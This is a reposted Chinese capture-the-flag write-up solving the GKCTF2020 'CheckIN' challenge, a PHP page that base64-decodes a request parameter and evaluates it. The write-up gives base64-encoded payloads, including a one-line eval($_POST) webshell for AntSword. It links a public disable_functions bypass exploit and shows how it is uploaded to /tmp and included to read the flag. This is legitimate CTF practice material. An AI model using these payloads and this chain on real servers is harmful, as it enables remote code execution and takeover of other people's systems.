[GKCTF2020]CheckIN
  TEZNKK3IfmPf 2024年04月19日 22 0

题目复现地址

<title>Check_In</title>
<?php 
highlight_file(__FILE__);
class ClassName
{
        public $code = null;
        public $decode = null;
        function __construct()
        {
                $this->code = @$this->x()['Ginkgo'];
                $this->decode = @base64_decode( $this->code );
                @Eval($this->decode);
        }

        public function x()
        {
                return $_REQUEST;
        }
}
new ClassName();

给了一个命令执行点,把命令base64编码一下即可执行,先构造一个phpinfo();

PS C:\Users\Administrator> php -r "echo base64_encode('phpinfo();');"
cGhwaW5mbygpOw==
查看 phpinfo()发现过滤了很多函数,猜测这题又是 disable_functions bypass

[GKCTF2020]CheckIN

先构造个

shell

,蚁剑连上去,

?Ginkgo=eval($_POST['m0c1nu7']);

,base64编码一下

?Ginkgo=ZXZhbCgkX1BPU1RbJ20wYzFudTcnXSk7

蚁剑shell设置里面Encoder选择base64

[GKCTF2020]CheckIN

 

[GKCTF2020]CheckIN

猜测需要执行/readflag文件才能得到flag,接下来上传disable functions bypass脚本突破执行命令即可,bypass脚本github有很多,自己找一下即可

这里贴一个bypass脚本地址:https:///mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php

改一下执行命令即可

[GKCTF2020]CheckIN

 

随便找一个能上传的路径,这里就在/tmp/路径下上传bypass脚本shell.php

[GKCTF2020]CheckIN

 

然后在命令执行点包含shell.php即可获得flag

include('/tmp/shell.php');base64编码之后得到:aW5jbHVkZSgnL3RtcC9zaGVsbC5waHAnKTs=

[GKCTF2020]CheckIN

【版权声明】本文内容来自摩杜云社区用户原创、第三方投稿、转载,内容版权归原作者所有。本网站的目的在于传递更多信息,不拥有版权,亦不承担相应法律责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@moduyun.com

  1. 分享:
最后一次编辑于 2024年04月19日 0

暂无评论

推荐阅读
  TEZNKK3IfmPf   2024年04月19日   15   0   0 php
  TEZNKK3IfmPf   2024年04月19日   15   0   0 xmlphp
  TEZNKK3IfmPf   2024年04月19日   18   0   0 php
TEZNKK3IfmPf